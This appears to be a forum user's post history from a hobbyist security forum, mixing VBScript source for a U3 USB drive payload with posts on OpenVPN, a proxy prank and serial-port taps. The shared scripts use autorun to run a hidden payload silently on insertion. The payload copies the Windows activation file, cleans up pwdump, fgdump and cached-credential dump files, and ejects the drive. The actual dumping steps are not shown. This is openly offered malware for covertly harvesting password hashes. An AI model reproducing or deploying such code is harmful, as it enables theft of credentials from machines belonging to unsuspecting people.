"\WinAudit.log" &amp; "&lt;/td&gt;&lt;/tr&gt;" 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If ' +----------------------------------+ ' + [XP ACTIVATION] + ' +----------------------------------+ If ReadINI("WPA","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_24"" target=""right""&gt;XP Activation&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_24""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;XP Activation&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Status&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" If objFSO.FileExists(objShell.ExpandEnvironmentStrings("%SystemRoot%") &amp; "\system32\wpa.dbl") Then objFSO.CopyFile objShell.ExpandEnvironmentStrings("%SystemRoot%") &amp; "\system32\wpa.dbl",strCurLog &amp; "\" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;This file is an activation backup and will only function when installed on the original machine that has had no hardware" &amp; _ " modifications. Boot the unit to safemode and copy the file to the System32 folder and restart.&lt;/td&gt;&lt;/tr&gt;" Else objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;File Not Found&lt;/td&gt;&lt;/tr&gt;" End If 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If ' +-----------------------------------+ ' + Cleanup + ' +-----------------------------------+ objShell.CurrentDirectory = strLogPath objFSO.DeleteFile strtmpFile,True If ReadINI("SAM FGDUMP","KeepFile",strIniFile)= 0 AND ReadINI("SAM FGDUMP","Enable",strIniFile)= 1 Then objFSO.DeleteFile "127.0.0.1.pwdump",True End If If ReadINI("SAM PWDUMP","KeepFile",strIniFile)= 0 AND ReadINI("SAM PWDUMP","Enable",strIniFile)= 1 Then objFSO.DeleteFile "127.0.0.1.pwdump",True End If If ReadINI("Cache","KeepFile",strIniFile)= 0 AND ReadINI("Cache","Enable",strIniFile)= 1 Then objFSO.DeleteFile "127.0.0.1.cachedump",True End If objFSO.DeleteFile strFireFile,True objShell.CurrentDirectory =U3 ' +-----------------------------------+ ' + NirTone + ' +-----------------------------------+ If ReadINI("Nirtone","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_99"" target=""right""&gt;NirTones&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_99""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;NirCmd Beep&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Status&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objShell.Run "nircmd.exe beep " &amp; ReadINI("Nirtone","Tone_1",strIniFile) , 0, True objShell.Run "nircmd.exe beep " &amp; ReadINI("Nirtone","Tone_2",strIniFile) , 0, True objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;Played&lt;/td&gt;&lt;/tr&gt;" 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If '::LEFT END HTML objLeftFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;" objLeftFile.Close Set objLeftFile = Nothing 'right end HTML objRightFile.WriteLine "&lt;hr color=""#ff9900"" size=""1""&gt;&lt;/center&gt;&lt;/body&gt;&lt;/html&gt;" objRightFile.Close objTextFile.Close Set objTextFile = Nothing Set objRightFile = Nothing arrPath = Split(Wscript.ScriptFullName, "\") strdriveletter = arrPath(0) '' First we have to change the current directory so we aren't holding the drive open. objShell.CurrentDirectory = "C:\" 'objShell.Run U3 &amp; "\RemoveDrive " &amp; strdriveletter , 0, True objShell.Run U3 &amp; "\deveject.exe -EjectDrive:" &amp; strdriveletter &amp; ":",0,True Set objShell = Nothing Set objFSO = Nothing WScript.Quit 'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions Function MyTrim(mystring) Dim start,Endpos start=1 for i=1 to Len(mystring) if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then start=i+1 else exit for end if next Endpos=Len(mystring) for i=Len(mystring) to 1 step -1 if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then Endpos=i-1 else exit for end if next if (endpos-start+1)&lt;0 then MyTrim="" Exit Function end if MyTrim=Mid(mystring,start,Endpos-start+1) End Function Function ReadINI(section,key,filename) if objFSO.FileExists(filename) then Dim fReadINI, bsection bsection=False Set fReadINI = objFSO.OpenTextFile(filename,1) Do while not(fReadINI.AtEndOfStream) Dim strini,trimstrini strini = fReadINI.ReadLine trimstrini = MyTrim(strini) if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then if StrComp(Trimstrini,"[" &amp; MyTrim(section) &amp; "]",1)=0 Then bsection=True else bsection =False end if Else if bsection then Dim poskey poskey = InStr(Trimstrini,"=") if posKey&gt;0 then if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then ReadINI = MyTrim(Mid(Trimstrini,poskey+1)) Exit Function end If End if end if End if Loop End if ReadINI = "" End Function Function RemoveHTML( strText ) Dim nPos1 Dim nPos2 nPos1 = InStr(strText, "&lt;") Do While nPos1 &gt; 0 nPos2 = InStr(nPos1 + 1, strText, "&gt;") If nPos2 &gt; 0 Then strText = Left(strText, nPos1 - 1) &amp; Mid(strText, nPos2 + 1) Else Exit Do End If nPos1 = InStr(strText, "&lt;") Loop RemoveHTML = strText End Function Function WMIDateStringToDate(utcDate) WMIDateStringToDate = CDate(Mid(utcDate, 5, 2) &amp; "/" &amp; _ Mid(utcDate, 7, 2) &amp; "/" &amp; _ Left(utcDate, 4) &amp; " " &amp; _ Mid (utcDate, 9, 2) &amp; ":" &amp; _ Mid(utcDate, 11, 2) &amp; ":" &amp; _ Mid(utcDate, 13, 2)) End Function
  19. <cd>\autorun.inf [AutoRun] open=wscript autorun.vbs icon=LaunchU3.exe,0 [Definitions] Launchpad=LaunchPad.exe Vtype=2 [CopyFiles] FileNumber=1 File1=LaunchPad.zip [Update] URL=
  20. In case the rapishares go un-used here's the .vbs source files <CD>\autorun.vbs Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next Dim aryVersion strComputerName = objShell.ExpandEnvironmentStrings("%computername%") 'strDate = Year(now()) &amp; Right("0" &amp; Month(now()), 2) &amp; Right("0" &amp; Day(now()), 2) 'strTime = Right("0" &amp; Hour(now()), 2) &amp; Right("0" &amp; Minute(now()), 2) &amp; Right("0" &amp; Second(now()), 2) For Each objDrive in colDrives 'ignore floppy drives - reserved by BIOS if they don't exist If UCase(objDrive.DriveLetter) &lt;&gt; "A" And UCase(objDrive.DriveLetter) &lt;&gt; "B" Then If objFSO.FileExists(objDrive.DriveLetter &amp; ":\System\SRC\payload.ini") Then strfd = objDrive.Driveletter &amp; ":" End If If objFSO.FileExists(objDrive.DriveLetter &amp; ":\System\SRC\payload.vbs") Then strU3 = objDrive.Driveletter &amp; ":" End If End if Next strIniFile = strfd &amp; "\System\SRC\payload.ini" If ReadINI("U3","Enable",strIniFile) Then objShell.Run ".\LaunchU3.exe -a", 0, False End If If objFSO.FileExists("c:\safety.txt")=False Then Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\" &amp; strComputerName &amp; "\root\cimv2") Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") For Each objOS in colOSes aryVersion= Split(objOS.Version,".") 'Version &amp; build Next Select Case True Case aryVersion(0) = 4 And aryVersion(1) = 10 OSVer = "WIN98" Case aryVersion(0) = 4 And aryVersion(1) = 90 OSVer = "WINME" Case aryVersion(0) = 5 And aryVersion(1) = 0 OSVer = "WIN2K" Case aryVersion(0) = 5 And aryVersion(1) = 1 OSVer = "XP" Case aryVersion(0) = 5 And aryVersion(1) = 2 OSVer = "WIN2003" Case aryVersion(0) = 6 And aryVersion(1) = 0 OSVer = "VISTA" Case Else OSVer = "UNKNOWN" End Select If ReadINI("Payload",OSVer,strIniFile) Then objShell.Run "wscript " &amp; strU3 &amp; "\System\SRC\payload.vbs " &amp; strfd &amp; " " &amp; strU3 &amp; " " &amp; OSVer, 0, False End If End if Wscript.Quit 'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions Function MyTrim(mystring) Dim start,Endpos start=1 for i=1 to Len(mystring) if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then start=i+1 else exit for end if next Endpos=Len(mystring) for i=Len(mystring) to 1 step -1 if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then Endpos=i-1 else exit for end if next if (endpos-start+1)&lt;0 then MyTrim="" Exit Function end if MyTrim=Mid(mystring,start,Endpos-start+1) End Function Function ReadINI(section,key,filename) if objFSO.FileExists(filename) then Dim fReadINI, bsection bsection=False Set fReadINI = objFSO.OpenTextFile(filename,1) Do while not(fReadINI.AtEndOfStream) Dim strini,trimstrini strini = fReadINI.ReadLine trimstrini = MyTrim(strini) if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then if StrComp(Trimstrini,"[" &amp; MyTrim(section) &amp; "]",1)=0 Then bsection=True else bsection =False end if Else if bsection then Dim poskey poskey = InStr(Trimstrini,"=") if posKey&gt;0 then if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then ReadINI = MyTrim(Mid(Trimstrini,poskey+1)) Exit Function end If End if end if End if Loop End if ReadINI = "" End Function
  21. beakmyn

    VPNs

    OpenVPN is my choice. Set it up on an old Dell C600. Now I can monitor the home network and redirect all my http traffic through my home network. I had a little hiccup getting it running at first but my configs are here http://ubuntuforums.org/showthread.php?t=882298 The only issue I have is my ISP throttles my upload so the connection is fine for web surfing but streaming video or VNC sessions are a bit slow.
  22. Upside down internet probably won't happen on the FON. I had a tough time working it out on my Linksys even with the SD card. giftrans and jpgflip will cross-compile after that it's a matter of setting up a transparent proxy (I tried a few different ones with limited success) and some iptable rules. It's probably easier to have the FON redirect traffic through a laptop which serves as the proxy and horsepower/storage for the image flipping.
  23. The "vampire tap" was a device that you plugged inline with the serial port and allowed another device to monitor the data on the port and still allow normal data flow to the intended device. This one had the most bells & whistles of the one I used last (3 years ago). http://cgi.ebay.com/RS-232-RS-449-HP-4951-...1QQcmdZViewItem Damn I wish I had one now! They come in real handy for troubleshoot archaic systems that no one remembers how they work. To use it you have a DB9 or DB25 connector the looks like a straight though with another connector sticking out the top, the "vampire tap". What you hook up to it is your choice.
  24. Which is why programs like HHD's serial monitor create a psuedo driver that you load before the other program and it shares the COM port to that program but still allows you to monitor it. You could also share the port by using CuriousTech's Xport. This will create a virtual serial port for the real one. Either way these must be run BEFORE the program that is to use the port since as you've found, they lock the port for exclusive access. Of course the other way is to put you're own serial device in-between by use of a vampire tap. Physical access trumps software. Or method 3 is to use HHD to port mirror and take what's gozinta/outa com1 and pass it on through to Com2.
×
×
  • Create New...